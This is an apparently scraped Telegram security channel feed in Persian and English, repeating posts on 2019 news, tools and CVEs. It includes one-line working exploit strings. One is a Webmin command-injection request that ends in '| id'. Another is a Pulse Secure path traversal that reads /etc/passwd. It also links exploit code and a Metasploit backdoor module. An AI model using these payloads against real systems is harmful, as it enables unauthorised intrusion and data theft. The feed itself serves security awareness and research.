امنیت اطلاعات
"Webmin 0day remote code execution" PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html #webmin #exploit #rce @sec_nerd
Exploit Database
Webmin 1.920 - Remote Code Execution
Webmin 1.920 - Remote Code Execution. CVE-2019-15107 . webapps exploit for Linux platform
Breaking Into Your Company's Internal Network - SuiteCRM 7.11.4
https://blog.ripstech.com/2019/breaking-into-your-internal-network/
#writeup
#pentest
#web
@sec_nerd
https://blog.ripstech.com/2019/breaking-into-your-internal-network/
#writeup
#pentest
#web
@sec_nerd
حمله باج افزاری به ۲۲ اداره دولتی در تگزاس و درخواست ۲.۵ میلیون دلار باج از سوی عاملان این حمله!
https://www.databreachtoday.com/texas-says-22-local-government-agencies-hit-by-ransomware-a-12937
#news
#ransome
#usa
@sec_nerd
https://www.databreachtoday.com/texas-says-22-local-government-agencies-hit-by-ransomware-a-12937
#news
#ransome
#usa
@sec_nerd
Databreachtoday
Texas Says 22 Local Government Agencies Hit by Ransomware
Ransomware-wielding attackers continue to target not just big businesses and large government agencies, but increasingly their smaller counterparts too. In Texas,
جایگزین Responder برای سیستم عاملهای ویندوزی
C#
https://github.com/Kevin-Robertson/InveighZero
PS
https://github.com/Kevin-Robertson/Inveigh
#windows
#network
#sniff
#ntlm
#responder
#pivoting
@sec_nerd
C#
https://github.com/Kevin-Robertson/InveighZero
PS
https://github.com/Kevin-Robertson/Inveigh
#windows
#network
#sniff
#ntlm
#responder
#pivoting
@sec_nerd
امنیت اطلاعات
جایگزین Responder برای سیستم عاملهای ویندوزی C# https://github.com/Kevin-Robertson/InveighZero PS https://github.com/Kevin-Robertson/Inveigh #windows #network #sniff #ntlm #responder #pivoting @sec_nerd
Pulse Connect Secure
versions 9.0RX, 8.3RX, and 8.2RX
arbitrary file disclosure
CVE-2019-11510
exploit:
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
https://www.exploit-db.com/exploits/47297
#pulse
#vpn
#lfd
@sec_nerd
versions 9.0RX, 8.3RX, and 8.2RX
arbitrary file disclosure
CVE-2019-11510
exploit:
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
https://www.exploit-db.com/exploits/47297
#pulse
#vpn
#lfd
@sec_nerd
Exploit Database
Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)
Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit). CVE-2019-11510 . webapps exploit for Multiple platform
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
This media is not supported in your browser
VIEW IN TELEGRAM
Subdomain enumeration tool to analyze domains and collect subdomains
https://github.com/Screetsec/Sudomy
#web
#pentest
#tools
#enum
#bugbounty
@sec_nerd
https://github.com/Screetsec/Sudomy
#web
#pentest
#tools
#enum
#bugbounty
@sec_nerd
امنیت اطلاعات
"Webmin 0day remote code execution" PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html #webmin #exploit #rce @sec_nerd
https://github.com/projectzeroindia/CVE-2019-11510
pulse secure ssl vpn
CVE-2019-11510
#network
#pentest
#pulse
@sec_nerd
pulse secure ssl vpn
CVE-2019-11510
#network
#pentest
#pulse
@sec_nerd
امنیت اطلاعات
"Webmin 0day remote code execution" PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html #webmin #exploit #rce @sec_nerd
https://github.com/rapid7/metasploit-framework/pull/12219
Backdoored Webmin 1.890
#msf
#webmin
#exploit
@sec_nerd
Backdoored Webmin 1.890
#msf
#webmin
#exploit
@sec_nerd
GitHub
Add Webmin password_change.cgi backdoor exploit by wvu-r7 · Pull Request #12219 · rapid7/metasploit-framework
Background
Please read http://www.webmin.com/exploit.html for full context.
Backdoored Webmin 1.890
msf5 exploit(unix/webapp/webmin_backdoor) > run
[*] Started reverse TCP handler on 172.28...
Please read http://www.webmin.com/exploit.html for full context.
Backdoored Webmin 1.890
msf5 exploit(unix/webapp/webmin_backdoor) > run
[*] Started reverse TCP handler on 172.28...
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
Telegram
Information Security
https://www.youtube.com/watch?v=v7JUMb70ON4
امنیت اطلاعات
#python #news @sec_nerd
https://developers.slashdot.org/story/19/08/24/2242248/uk-cybersecurity-agency-urges-devs-to-drop-python-2
#python
#news
@sec_nerd
#python
#news
@sec_nerd
developers.slashdot.org
UK Cybersecurity Agency Urges Devs To Drop Python 2
Python's End-of-Life date is 129 days away, warns the UK National Cyber Security Centre (NCSC). "There will be no more bug fixes, or security updates, from Python's core developers." An anonymous reader quotes ZDNet: The UK's cyber-security agency warned…
افشای اطلاعات کاربران hostinger
طبق اطلاعیه منتشر شده از سوی hostinger ،آسیب پذیری موجود در API این شرکت باعث لو رفتن اطلاعات نزدیک به ۱۴ میلیون کاربر شده است که در واکنش به این اتفاق، هاستینگر مجبور به ریست کردن پسورد تمامی کاربران شده.
https://www.hostinger.com/blog/security-incident-what-you-need-to-know/
#news
#breach
@sec_nerd
طبق اطلاعیه منتشر شده از سوی hostinger ،آسیب پذیری موجود در API این شرکت باعث لو رفتن اطلاعات نزدیک به ۱۴ میلیون کاربر شده است که در واکنش به این اتفاق، هاستینگر مجبور به ریست کردن پسورد تمامی کاربران شده.
https://www.hostinger.com/blog/security-incident-what-you-need-to-know/
#news
#breach
@sec_nerd
Hostinger Blog
Security Incident: What We Did to Improve Security of Our Infrastructure
Everything you need to know about the security incident and what was done to make Hostinger and its users more secure.